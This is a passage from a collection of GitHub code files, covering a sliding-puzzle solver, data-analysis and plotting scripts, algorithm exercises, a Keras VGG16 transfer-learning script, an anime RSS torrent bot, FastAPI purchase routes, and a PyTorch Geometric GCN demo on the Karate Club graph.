It is already solved\n self.solver[solved.to_tuple()] = None\n\n # Start the search from the solved puzzle\n q: Deque[Puzzle] = deque()\n q.append(solved)\n\n # While there are more puzzles to be inspected, continue searching\n while len(q):\n # Get the current puzzle\n current_puzzle: Puzzle = q.popleft()\n # Go through every possible next move for the current puzzle\n for next_puzzle in current_puzzle.next_moves():\n # If there is a faster way to get to this puzzle state, skip it\n if next_puzzle.to_tuple() not in self.solver:\n # If this is the first time we're seeing it, record it's parent\n self.solver[next_puzzle.to_tuple()] = current_puzzle.to_tuple()\n # And add it to the queue for future inspection\n q.append(next_puzzle)\n\n @lru_cache(maxsize=None)\n def solve_steps(self, puzzle_tuple: Union[Tuple[Tuple[int]], None]) -> int:\n \"\"\"Given a puzzle, get the number of steps to optimally solve that puzzle\"\"\"\n if puzzle_tuple not in self.solver:\n return -1\n next_puzzle = self.solver[puzzle_tuple]\n return 1 + self.solve_steps(next_puzzle) if next_puzzle else 0\n\n def show_required_moves(self, puzzle_tuple: Tuple[Tuple[int]]) -> None:\n \"\"\"Given a puzzle, print the exact moves required to optimally solve\"\"\"\n if puzzle_tuple not in self.solver:\n print(\"Given puzzle is unsolvable.\")\n return\n current_puzzle = puzzle_tuple\n next_puzzle = self.solver[current_puzzle]\n # While the puzzle hasn't been solved, print the move\n while next_puzzle != None:\n print(get_diff(current_puzzle, next_puzzle))\n current_puzzle, next_puzzle = next_puzzle, self.solver[next_puzzle]\n\n def show_solve_trace(self, puzzle_tuple: Union[Tuple[Tuple[int]], None]) -> int:\n \"\"\"Given a puzzle, print the steps to optimally solve that puzzle\"\"\"\n # If this puzzle is not reachable\n if puzzle_tuple not in self.solver:\n print(\"Given puzzle is unsolvable.\")\n return -1\n\n # Print the puzzle out and a line separator\n print(\n \"\\n\".join(\n \" \".join(map(lambda v: f\"{v:2d}\" if v else \" \", row))\n for row in puzzle_tuple\n )\n )\n print(\"-\" * (len(puzzle_tuple) * 3 - 1))\n\n next_puzzle = self.solver[puzzle_tuple]\n # If puzzle_tuple describes the solved puzzle\n if next_puzzle == None:\n # No moves need to be made\n return 0\n\n # Otherwise, search this puzzle's parent and count a move\n return 1 + self.show_solve_trace(next_puzzle)\n\n\ndef get_diff(old_puzzle: Tuple[Tuple[int]], new_puzzle: Tuple[Tuple[int]]) -> int:\n \"\"\"Given two move-adjacent puzzles in the tuple format, find which tile was moved\"\"\"\n for old_row, new_row in zip(old_puzzle, new_puzzle):\n for old_value, new_value in zip(old_row, new_row):\n # Look through each cell for the empty space.\n # Whatever replaced the empty space was the tile that moved\n if old_value == 0:\n return new_value\n if new_value == 0:\n return old_value\n return -1\n\n\ndef main(filename: str, show_moves_only: bool) -> None:\n puzzle = Puzzle.read_from_file(filename)\n solver = PuzzleSolver(len(puzzle.puzzle))\n if show_moves_only:\n solver.show_required_moves(puzzle.to_tuple())\n else:\n num_moves = solver.show_solve_trace(puzzle.to_tuple())\n print(f\"Solved in {num_moves} move{'s' * (num_moves != 1)}\")\n\n\ndef display_frequencies():\n frequencies: DefaultDict[List:int] = defaultdict(list)\n\n puzzle_solver: PuzzleSolver = PuzzleSolver(3)\n for puzzle_tuple in puzzle_solver.solver:\n frequencies[puzzle_solver.solve_steps(puzzle_tuple)].append(puzzle_tuple)\n\n total_puzzles: int = 0\n for frequency in frequencies:\n 
print(f\"{frequency:2d}: {len(frequencies[frequency]):5d}\")\n total_puzzles += len(frequencies[frequency])\n\n print(\"Total:\", total_puzzles)\n\n\nif __name__ == \"__main__\":\n if 2 <= len(argv) <= 3:\n main(argv[1], len(argv) == 3 and argv[2] in [\"-m\", \"--moves\", \"--moves-only\"])\n else:\n display_frequencies()\n","repo_name":"andjf/sliding_puzzle_solver","sub_path":"solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":8442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"72718524601","text":"import random\n\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.sql.expression import func, select\n\nfrom .conn import get_connection\nfrom .models import Pessoa, Transacao, UltimaCompra\nfrom core.utils import (name_fake, address_fake,\n company_fake, value_fake,\n status_fake, contract_fake,\n date_fake)\n\n\nclass Manager:\n\n def __init__(self):\n get_connection()\n\n def all(self):\n return list(Pessoa.objects.values().all())\n\n def get(self, cpf):\n return Pessoa.objects.values().get({'_id':cpf})\n\n def detele(self):\n Pessoa.objects.all().delete()\n \n def random_create(self, lista_cpf):\n for person_info in lista_cpf:\n ultima_compra = UltimaCompra( \n empresa=company_fake(),\n data=date_fake(),\n valor=value_fake()\n )\n\n transacoes = []\n for _ in range(3):\n transacoes.append(Transacao(\n data=date_fake(),\n valor=value_fake()\n ))\n\n Pessoa(\n cpf=person_info,\n ultima_consulta=date_fake(),\n transacoes=transacoes,\n ultima_compra=ultima_compra\n ).save()","repo_name":"asafepy/desafio-api-bureau","sub_path":"base_c/core/db/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"25079231383","text":"import json\nfrom os import path\nimport collections\n\nfrom scipy.sparse import data\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport japanize_matplotlib # matplotで日本語使える\n\nID = [255710, 227300, 427520]\n# ID = [255710, 227300]\n\nFORUM_FILENAMES = list(map(lambda x: \"../../data/\" +\n str(x) + \"/\" + str(x) + \"_forum_cleaned.json\", ID))\nREVIEW_FILENAMES = list(map(lambda x: \"../../data/\" +\n str(x) + \"/\" + str(x) + \"_review_cleaned_out.json\", ID))\n\nLABELS = [\"review\\n(Cities: Skylines)\", \"review\\n(Euro Truck Sim)\", \"review\\n(Factorio)\",\n \"forum\\n(Cities: Skylines)\", \"forum\\n(Euro Truck Sim)\", \"forum\\n(Factorio)\"]\n# LABELS = [\"review\\n(Cities: Skylines)\", \"review\\n(Euro Truck Sim)\",\n# \"forum\\n(Cities: Skylines)\", \"forum\\n(Euro Truck Sim)\"]\n# LABELS = [\"フォーラム\", \"レビュー\"]\n\nmax_length = 128\n\n\ndef main():\n forums = []\n for f in FORUM_FILENAMES:\n forums.append(load_json(path.join(path.dirname(__file__), f)))\n reviews = []\n for r in REVIEW_FILENAMES:\n reviews.append(load_json(path.join(path.dirname(__file__), r)))\n\n word_count_barplot(forums, reviews)\n # word_count_barplot_horizontal(forums, reviews)\n # frequent_vocabulary(forums, reviews):\n\n\ndef word_count_barplot(forums, reviews): # 単語数の分布\n forums_num_words = []\n for i, forum in enumerate(forums):\n tmp = []\n sum = 0\n for topics in forum:\n tmp.append(topics[\"num_words\"])\n sum += topics[\"num_words\"]\n forums_num_words.append(tmp)\n forum_average = sum / len(forum)\n print(\"[forum{0}]:{1}\".format(ID[i], forum_average))\n\n reviews_num_words = []\n for i, review in enumerate(reviews):\n tmp = []\n sum = 0\n for topics in 
review:\n tmp.append(topics[\"num_words\"])\n sum += topics[\"num_words\"]\n reviews_num_words.append(tmp)\n review_average = sum / len(review)\n print(\"[review{0}]:{1}\".format(ID[i], review_average))\n\n plt.figure(figsize=(10, 6))\n df = reviews_num_words + forums_num_words\n plt.boxplot(df, labels=LABELS, sym=\"\", showmeans=True)\n plt.show()\n\n\ndef word_count_barplot_horizontal(forums, reviews): # 単語数の分布(横向き棒グラフ)\n forums_num_words = []\n for i, forum in enumerate(forums):\n tmp = []\n sum = 0\n for topics in forum:\n tmp.append(topics[\"num_words\"])\n sum += topics[\"num_words\"]\n forums_num_words.append(tmp)\n forum_average = sum / len(forum)\n print(\"[forum{0}]:{1}\".format(ID[i], forum_average))\n\n reviews_num_words = []\n for i, review in enumerate(reviews):\n tmp = []\n sum = 0\n for topics in review:\n tmp.append(topics[\"num_words\"])\n sum += topics[\"num_words\"]\n reviews_num_words.append(tmp)\n review_average = sum / len(review)\n print(\"[review{0}]:{1}\".format(ID[i], review_average))\n\n plt.figure(figsize=(10, 6))\n df = forums_num_words + reviews_num_words\n plt.boxplot(df, labels=LABELS, sym=\"\",\n showmeans=True, vert=False, widths=.5)\n plt.show()\n\n\ndef frequent_vocabulary(forums, reviews): # 頻出語彙\n plt.rcParams[\"font.size\"] = 18\n for i, forum in enumerate(forums):\n forum_word_list = []\n for topics in forum:\n if topics[\"num_words\"] <= max_length:\n forum_word_list.extend(topics[\"combined\"].split())\n c = collections.Counter(forum_word_list).most_common(20)\n # print(c.most_common(20))\n df = [val[0] for val in c]\n label = [val[1] for val in c]\n plt.title(LABELS[i], fontsize=16)\n plt.barh(df[:: -1], label[:: -1])\n plt.show()\n\n for i, review in enumerate(reviews):\n review_word_list = []\n for topics in review:\n if topics[\"num_words\"] <= max_length:\n review_word_list.extend(topics[\"review_lem\"].split())\n c = collections.Counter(review_word_list).most_common(20)\n # print(c.most_common(20))\n df = [val[0] for val in c]\n label = [val[1] for val in c]\n plt.title(LABELS[i+3], fontsize=16)\n plt.barh(df[:: -1], label[:: -1])\n plt.show()\n\n\ndef load_json(json_filepath):\n with open(json_filepath, mode='r') as f:\n json_data = json.load(f)\n return json_data\n\n\ndef save_json(output_list, json_filepath):\n with open(json_filepath, mode='w') as f:\n json.dump(output_list, f, sort_keys=True, indent=4)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"parthenos0908/steam_review","sub_path":"code/research/research.py","file_name":"research.py","file_ext":"py","file_size_in_byte":4621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9635793370","text":"# 시간 초과\n# import sys\n\n# n = sys.stdin.readline()\n# nums1 = list(map(int, sys.stdin.readline().split()))\n# m = sys.stdin.readline()\n# nums2 = list(map(int, sys.stdin.readline().split()))\n\n# for num in nums2:\n# if num in nums1:\n# print(1)\n# else:\n# print(0)\n\n# 이분 탐색\nn = int(input())\nnums1 = sorted(list(map(int, input().split(' '))))\nm = int(input())\nnums2 = list(map(int, input().split(' ')))\n\ndef binary_search(target, array):\n start = 0 # 시작 인덱스\n end = n-1 # 마지막 인덱스\n pointer = (start + end) // 2 # 현재 포인터가 가르키고 있는 인덱스\n \n while start <= end:\n if array[pointer] == target:\n return 1\n elif array[pointer] < target:\n start = pointer + 1\n else:\n end = pointer - 1\n pointer = (start + end) // 2\n return 0\n\nfor i in range(len(nums2)):\n print(binary_search(nums2[i], 
nums1))","repo_name":"annahxxl/algorithm-study","sub_path":"problem-solving/boj/solved.ac/class2/수 찾기_1920.py","file_name":"수 찾기_1920.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37667777710","text":"# vgg.py\n# transfer learning using vgg16 conv_base for cats_and_dogs_dataset\n# tested on Ubuntu 16.04 + Tesla K80 (Google Cloud Compute)\n# Zhihan Yang, 10 Mar 19\n\n# \nfrom keras.applications import VGG16 # VGG16 is a function\nconv_base = VGG16(weights='imagenet', include_top=False, input_shape=(150, 150, 3)) # conv_base is a models.Sequential()\n\n# \n# parameters for VGG16 function\n# - 'include_top'\n# - whether to include the densely connected classifier on top of the conv_base: 'True' for yes; 'False' for no\n# - the default classifier corresponds to the 1000 classes of ImageNet\n# - since we want to do a different classification, we want to omit the\n# classifier and train a new one\n# - 'input_shape'\n# - the shape of the image tensors that you'll feed to the network\n# - if you don't pass it, the network will be able to process inputs of any\n# shape\n\n# \nimport os\nimport numpy as np\nfrom keras.preprocessing.image import ImageDataGenerator\n\n# set up tags for data lookup\nbase_dir = '/Users/yangzhihan/datasets/cats_and_dogs_dataset'\ntrain_dir = os.path.join(base_dir, 'train')\nvalidation_dir = os.path.join(base_dir, 'validation')\ntest_dir = os.path.join(base_dir, 'test')\n\ndatagen = ImageDataGenerator(rescale=1./255) # normalize image\nbatch_size = 20\n\ndef extract_features(directory, sample_count):\n\n features = np.zeros(shape=(sample_count, 4, 4, 512))\n # call 'conv_base.summary()' and you will see that the shape of the output of the final MaxPooling2D is (None, 4, 4, 512)\n\n labels = np.zeros(shape=(sample_count))\n # a label is an n-dim vector with n=the number of categories to classify\n\n generator = datagen.flow_from_directory(directory, target_size=(150, 150), batch_size=batch_size, class_mode='binary')\n # - directory: each folder (train, validation and test) should contain each subdirectory per class\n # - target_size: the dims to which all images found will be resized\n # - class_mode: \"binary\" will be 1D binary labels\n\n i = 0\n for inputs_batch, labels_batch in generator:\n features_batch = conv_base.predict(inputs_batch)\n print(features_batch.shape)\n features[i * batch_size : (i + 1) * batch_size] = features_batch\n labels[i * batch_size : (i + 1) * batch_size] = labels_batch\n i += 1\n if i * batch_size >= sample_count:\n break\n return features, labels\n\ntrain_features, train_labels = extract_features(train_dir, 2000)\nvalidation_features, validation_labels = extract_features(validation_dir, 1000)\ntest_features, test_labels = extract_features(test_dir, 1000)\n\n# \nfrom keras import models\nfrom keras import layers\nfrom keras import optimizers\n\nmodel = models.Sequential()\nmodel.add(layers.Flatten(input_shape=(4, 4, 512)))\nmodel.add(layers.Dense(256, activation='relu', input_dim=4 * 4 * 512))\nmodel.add(layers.Dropout(0.5))\nmodel.add(layers.Dense(1, activation='sigmoid'))\n\nmodel.compile(optimizer=optimizers.RMSprop(lr=2e-5), loss='binary_crossentropy', metrics=['acc'])\nhistory = model.fit(train_features, train_labels, epochs=30, batch_size=20, validation_data=(validation_features, validation_labels))\n\n# \nmodel.save(\"vgg_cats_and_dogs.h5\")\n\n# 
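The BOJ 1920 record above replaces the timed-out O(n*m) `in` scan with an explicit binary search over a sorted list. The standard-library `bisect` module gives the same O(log n) membership test without hand-maintaining the start/end pointers:

```python
from bisect import bisect_left

def contains(sorted_nums, target):
    # O(log n) membership test on a sorted list, equivalent to the
    # hand-rolled binary_search above returning 1 or 0.
    i = bisect_left(sorted_nums, target)
    return 1 if i < len(sorted_nums) and sorted_nums[i] == target else 0

nums1 = sorted([4, 1, 5, 2, 3])
for q in (1, 6, 3):
    print(contains(nums1, q))  # 1, 0, 1
```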
end\n","repo_name":"zhihanyang2022/cnn-experiments","sub_path":"vgg16_cats_and_dogs.py","file_name":"vgg16_cats_and_dogs.py","file_ext":"py","file_size_in_byte":3235,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"8748117731","text":"import unittest\nfrom functools import cmp_to_key\n\n\ndef is_right_order(a, b):\n if type(a) is int and type(b) is int:\n if a < b:\n return True\n if a > b:\n return False\n return None\n\n if type(a) is int:\n return is_right_order([a], b)\n\n if type(b) is int:\n return is_right_order(a, [b])\n\n for i in range(max(len(a), len(b))):\n if i == len(a):\n return True\n if i == len(b):\n return False\n ret = is_right_order(a[i], b[i])\n if ret != None:\n return ret\n\n\ndef part_one(filename):\n group = open(filename).read().strip().split(\"\\n\\n\")\n s = 0\n for i, lines in enumerate(group):\n a, b = lines.splitlines()\n a, b = eval(a), eval(b)\n if is_right_order(a, b):\n s += i + 1\n return s\n\n\ndef part_two(filename):\n group = open(filename).read().strip().split(\"\\n\\n\")\n\n d1, d2 = [[2]], [[6]]\n packets = [d1, d2]\n for lines in group:\n a, b = lines.splitlines()\n a, b = eval(a), eval(b)\n packets += [a, b]\n\n packets = sorted(\n packets, key=cmp_to_key(lambda a, b: -1 if is_right_order(a, b) else 1)\n )\n\n for i, p in enumerate(packets):\n if p == d1:\n i1 = i + 1\n elif p == d2:\n i2 = i + 1\n break\n\n return i1 * i2\n\n\ndef main():\n filename = \"input.txt\"\n print(f\"Part 1: {part_one(filename)}\")\n print(f\"Part 2: {part_two(filename)}\")\n\n\nclass TestCase(unittest.TestCase):\n def test_part_one(self):\n self.assertEqual(part_one(\"input_test.txt\"), 13)\n\n def test_part_two(self):\n self.assertEqual(part_two(\"input_test.txt\"), 140)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"lizhiquan/advent-of-code","sub_path":"2022/day-13/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"15795761560","text":"\"\"\"\nModule to understand time performance impact using asyncio for CPU extensive operations\n\"\"\"\n\nimport asyncio\nimport time\n\nCOUNT = 50000000 # 50 M\n\n\nasync def countdown(counter):\n \"\"\"\n function decrements counter by one each time, until counter becomes zero\n Args:\n counter (int): counter value\n \"\"\"\n while counter > 0:\n counter -= 1\n\n\nasync def main():\n \"\"\"\n async function to create tasks and run them at same time\n \"\"\"\n task1 = asyncio.create_task(countdown(COUNT // 2))\n\n task2 = asyncio.create_task(countdown(COUNT // 2))\n\n start = time.time()\n # Start both tasks at same time\n await task1\n await task2\n end = time.time()\n\n print(\"Time taken in seconds -\", end - start)\n\n\nif __name__ == \"__main__\":\n asyncio.run(main())\n","repo_name":"Rajpratik71/pythonTraining-CalsoftInc","sub_path":"Day_07/sample_asyncio_doesnot_reduce_cpu_time.py","file_name":"sample_asyncio_doesnot_reduce_cpu_time.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"37029822688","text":"import sys\ninput = sys.stdin.readline\n\nn, m = map(int, input().split())\npack = 1000\nsingle = 1000\nfor _ in range(m):\n a, b = map(int, input().split())\n if a <= pack:\n pack = a\n if b <= single:\n single = b\nres = 0\nif n >= 6:\n quo = n//6\n rem = n % 6\n case = (pack*(quo+1), pack*quo+single*rem, single*n)\n res 
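The VGG16 record above runs every image through the frozen convolutional base exactly once, caches the resulting 4x4x512 feature maps, and trains only a small dense classifier on them. A compressed sketch of that two-stage flow using the same Keras calls as the record, with random arrays standing in for the cats-and-dogs images (the ImageNet weights download on first use):

```python
import numpy as np
from keras.applications import VGG16
from keras import models, layers

# Stage 1: push images through the frozen conv base once, cache features.
conv_base = VGG16(weights="imagenet", include_top=False, input_shape=(150, 150, 3))
images = np.random.rand(8, 150, 150, 3).astype("float32")  # stand-in batch
features = conv_base.predict(images)                       # (8, 4, 4, 512)

# Stage 2: train only a small classifier on the cached features, so the
# expensive convolutional forward pass never repeats per epoch.
clf = models.Sequential([
    layers.Flatten(input_shape=(4, 4, 512)),
    layers.Dense(256, activation="relu"),
    layers.Dropout(0.5),
    layers.Dense(1, activation="sigmoid"),
])
clf.compile(optimizer="rmsprop", loss="binary_crossentropy", metrics=["acc"])
clf.fit(features, np.random.randint(0, 2, 8), epochs=1, batch_size=4)
```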
= min(case)\nelse:\n res = min(pack, single*n)\nprint(res)\n","repo_name":"donggoolosori/BOJ_Record","sub_path":"Category/Greedy/1049-기타줄/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"12443373269","text":"import requests\nimport json\nimport feedparser\nimport anitopy\nfrom yaml import load, dump\n\n\nconfig = {\n 'resolution': None,\n 'rpc-url': None\n}\n\nfeeds = []\n\ndef check_torrent(title, feed_id):\n info = anitopy.parse(title)\n\n check_title = False\n check_resolution = False\n\n if len(feeds[feed_id]['resolutions']) == 0:\n feeds[feed_id]['resolutions'] = [config['resolution']]\n\n try:\n if info['video_resolution'] in feeds[feed_id]['resolutions']:\n check_resolution = True\n except KeyError:\n check_resolution = False\n\n if len(feeds[feed_id]['anime-list']) == 0:\n check_title = True\n else:\n for anime in feeds[feed_id]['anime-list']:\n if anime['title'] == info['anime_title']:\n check_title = True\n try:\n if anime['resolution'] == info['video_resolution']:\n check_resolution = True\n else:\n check_resolution = False\n except KeyError:\n print('No resolution was set for the anime: %s' % anime['title'])\n\n return check_title and check_resolution\n\ndef get_session_id():\n res = requests.get(config['rpc-url'])\n return res.headers['X-Transmission-Session-Id']\n\ndef add_torrent(torrent):\n sessionId = get_session_id()\n \n headers = {\n 'content-type': 'application/json',\n 'X-Transmission-Session-Id': sessionId\n }\n \n payload = {\n 'method': 'torrent-add',\n 'arguments': {\n 'filename': torrent\n }\n }\n\n response = requests.post(\n config['rpc-url'], data=json.dumps(payload), headers=headers).json()\n\n print(response)\n\ndef handle_feeds():\n for index, feed in enumerate(feeds):\n if not feed['enabled']:\n continue\n \n torrent = feedparser.parse(feed['url'])\n for entry in torrent.entries:\n if check_torrent(entry.title, int(index)):\n add_torrent(entry.guid)\n\ndef load_config(filename):\n data = None\n with open(filename, 'r') as file:\n data = load(file)\n \n # Set default resolution\n try:\n config['resolution'] = data['default-resolution']\n except KeyError:\n config['resolution'] = '720p'\n\n # Set RPC URL\n try:\n config['rpc-url'] = data['rpc-server']['protocol'] + '://' + data['rpc-server']['host'] + ':' + data['rpc-server']['post'] + data['rpc-server']['path']\n except KeyError:\n config['rpc-url'] = 'http://localhost:9091/transmission/rpc'\n\n # Load feeds\n for feed in data['feeds']:\n feeds.append(feed)\n\n return data\n\ndef main():\n data = load_config('config.yml')\n print(data['rpc-server'])\n \n handle_feeds()\n\nif __name__ == '__main__':\n main()\n","repo_name":"youssefhabri/AniRSS-Bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2805,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"31251708009","text":"from fastapi import APIRouter, Depends\nfrom models import Compra_Vacas, Compra_Cerdos\nfrom middlewares.response import custom_Response_Exito, custom_Response_Error\nfrom middlewares.verify_token import verify_token\nfrom services.compras_services import (\n post_compra_vacas,\n post_compra_cerdos,\n get_compras, \n get_compras_saldo, \n delete_compra, \n get_compra, \n get_compras_by_proveedor\n)\n\nrouter = APIRouter()\n\n# Ruta POST para cargar una compra\n@router.post(\"/vaca\")\nasync def new_compra_vacas(compra: 
Compra_Vacas, token_data=Depends(verify_token)):\n try:\n response = await post_compra_vacas(compra)\n if response:\n return custom_Response_Exito(compra)\n\n except Exception as e:\n print(e)\n return custom_Response_Error(message=\"Ocurrió un error inesperado \", status_code=400)\n\n\n# Ruta POST para cargar una compra\n@router.post(\"/cerdo\")\nasync def new_compra_cerdos(compra: Compra_Cerdos, token_data=Depends(verify_token)):\n try:\n response = await post_compra_cerdos(compra)\n if response:\n return custom_Response_Exito(compra)\n\n except Exception as e:\n print(e)\n return custom_Response_Error(message=\"Ocurrió un error inesperado \", status_code=400)\n\n\n# Ruta GET para obtener todas las Compras\n@router.get(\"/all\")\nasync def get_all_compras(token_data=Depends(verify_token)):\n try:\n compras = await get_compras()\n return custom_Response_Exito(compras)\n except Exception as e:\n print(e)\n return custom_Response_Error(message=\"Ocurrió un error inesperado \", status_code=400)\n\n\n# Ruta que trae las compras con saldo > 0\n@router.get(\"/saldo\")\nasync def get_all_compras_saldo(token_data=Depends(verify_token)):\n try:\n faenas = await get_compras_saldo()\n return custom_Response_Exito(faenas)\n except Exception as e:\n print(e)\n return custom_Response_Error(message=\"Ocurrió un error inesperado \", status_code=400)\n\n\n# Ruta que trae una compra por ID\n@router.get(\"/id/{id}\")\nasync def get_compra_id(id: str, token_data=Depends(verify_token)):\n try:\n compra = await get_compra(id)\n return custom_Response_Exito(compra)\n except Exception as e:\n print(e)\n return custom_Response_Error(message=\"Ocurrió un error inesperado \", status_code=400)\n\n\n# Ruta que trae una compra por ID\n@router.get(\"/proveedor/{proveedor}\")\nasync def get_compras_proveedor(proveedor: str, token_data=Depends(verify_token)):\n try:\n compras = await get_compras_by_proveedor(proveedor)\n return custom_Response_Exito(compras)\n except Exception as e:\n print(e)\n return custom_Response_Error(message=\"Ocurrió un error inesperado \", status_code=400)\n\n\n# Eliminar una compra por ID\n@router.delete(\"/{id}\")\nasync def delete_compra_id(id: str, token_data=Depends(verify_token)):\n try:\n response = await delete_compra(id)\n message = {\"message\": \"La Compra se eliminó correctamente\"}\n if response:\n return custom_Response_Exito(message)\n else:\n return custom_Response_Error(message=\"No se pudo eliminar la compra\", status_code=400)\n\n except Exception as e:\n print(e)\n return custom_Response_Error(message=\"Ocurrió un error inesperado \", status_code=400)\n","repo_name":"sergiodm92/api_carnes_gestion_phyton","sub_path":"routers/compras.py","file_name":"compras.py","file_ext":"py","file_size_in_byte":3329,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16992020700","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 2023-06-11 (Sun) 22:14:18\n\nkarate GNN dev\n\n@author: I.Azuma\n\"\"\"\n#%%\nimport torch\nprint(torch.__version__) # 2.0.1\nprint(torch.cuda.get_device_name()) # NVIDIA GeForce RTX 3090\nimport torch.nn.functional as F\n \nfrom torch_geometric.nn import GCNConv\nfrom torch_geometric.data import Data\nfrom torch_geometric.datasets import KarateClub\nfrom torch_geometric.utils import to_networkx\n \nimport networkx as nx\nfrom matplotlib import pyplot as plt\nimport numpy as np\n\n#%%\ndef check_graph(data):\n '''Display graph info'''\n print(\"structure:\", data)\n print(\"key: \", data.keys)\n 
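Every route in the compras router above takes `token_data=Depends(verify_token)`, so authentication runs before the handler body does. A self-contained sketch of that dependency-injection pattern; the header name and token value here are hypothetical stand-ins, not the project's actual scheme:

```python
from fastapi import Depends, FastAPI, Header, HTTPException

app = FastAPI()

def verify_token(authorization: str = Header(default="")) -> dict:
    # Hypothetical stand-in for the real verify_token dependency: reject
    # the request before the route body runs unless the header matches.
    if authorization != "Bearer secret":
        raise HTTPException(status_code=401, detail="invalid token")
    return {"user": "demo"}

@app.get("/compras/all")
def get_all_compras(token_data: dict = Depends(verify_token)):
    # By the time execution reaches here, verify_token has succeeded.
    return {"compras": [], "requested_by": token_data["user"]}
```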
print(\"node:\", data.num_nodes)\n print(\"edge:\", data.num_edges)\n print(\"node feature:\", data.num_node_features)\n print(\"isolated node:\", data.contains_isolated_nodes())\n print(\"self loop:\", data.contains_self_loops())\n print(\"=== node feature:x ===\")\n print(data['x'])\n print(\"=== node class:y ===\")\n print(data['y'])\n print(\"=== edge format ===\")\n print(data['edge_index']) # sender and receiver\n\n# load dataset\ndataset = KarateClub()\n \nprint(\"graph number:\", len(dataset))\nprint(\"class number:\",dataset.num_classes) \n \ndata = dataset[0]\ncheck_graph(data)\n\n#%%\nnxg = to_networkx(data)\n \n# pagerank\npr = nx.pagerank(nxg)\npr_max = np.array(list(pr.values())).max()\n \n# layout\ndraw_pos = nx.spring_layout(nxg, seed=0) \n \n# node color\ncmap = plt.get_cmap('tab10')\nlabels = data.y.numpy()\ncolors = [cmap(l) for l in labels]\n \n# display\nplt.figure(figsize=(10, 10))\nnx.draw_networkx_nodes(nxg, \n draw_pos,\n node_size=[v / pr_max * 1000 for v in pr.values()],\n node_color=colors, alpha=0.5)\nnx.draw_networkx_edges(nxg, draw_pos, arrowstyle='-', alpha=0.2)\nnx.draw_networkx_labels(nxg, draw_pos, font_size=10)\n \nplt.title('KarateClub')\nplt.show()\n\n#%%\nclass Net(torch.nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n hidden_size = 10\n self.conv1 = GCNConv(dataset.num_node_features, hidden_size)\n self.conv2 = GCNConv(hidden_size, dataset.num_classes)\n \n def forward(self, data):\n x, edge_index = data.x, data.edge_index\n x = self.conv1(x, edge_index)\n x = F.relu(x)\n # x = F.dropout(x, training=self.training)\n x = self.conv2(x, edge_index)\n \n return F.log_softmax(x, dim=1)\n\n#%% train\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\nmodel = Net()\nmodel.train() # training phase\n# input data\ndata = dataset[0]\n \n# optimizer\noptimizer = torch.optim.Adam(model.parameters(), lr=0.01)\n \n# learnig loop\nfor epoch in range(100):\n optimizer.zero_grad()\n out = model(data)\n loss = F.nll_loss(out, data.y)\n loss.backward()\n optimizer.step()\n print('Epoch %d | Loss: %.4f' % (epoch, loss.item()))\n\nmodel.eval() # evaluation phase\n_, pred = model(data).max(dim=1)\n\nprint(\"Results: \", pred)\nprint(\"True: \", data[\"y\"])","repo_name":"mizuno-group/TopoPathology","sub_path":"dev/gnn/karate_dev.py","file_name":"karate_dev.py","file_ext":"py","file_size_in_byte":2957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3964751507","text":"import paddle\nfrom paddle import nn\n\nfrom .mobile_bert_self_att import MobileBertSelfAttention\nfrom .mobile_bert_self_out import MobileBertSelfOutput\n\nfrom typing import List, Tuple, Set\n\n\nclass MobileBertAttention(nn.Layer):\n def __init__(self, config):\n super().__init__()\n self.self = MobileBertSelfAttention(config)\n self.output = MobileBertSelfOutput(config)\n self.pruned_heads = set()\n\n def prune_heads(self, heads):\n if len(heads) == 0:\n return\n heads, index = find_pruneable_heads_and_indices(\n heads, self.self.num_attention_heads, self.self.attention_head_size, self.pruned_heads\n )\n\n # Prune linear layers\n self.self.query = prune_linear_layer(self.self.query, index)\n self.self.key = prune_linear_layer(self.self.key, index)\n self.self.value = prune_linear_layer(self.self.value, index)\n self.output.dense = prune_linear_layer(self.output.dense, index, dim=1)\n\n # Update hyper params and store pruned heads\n self.self.num_attention_heads = self.self.num_attention_heads - 
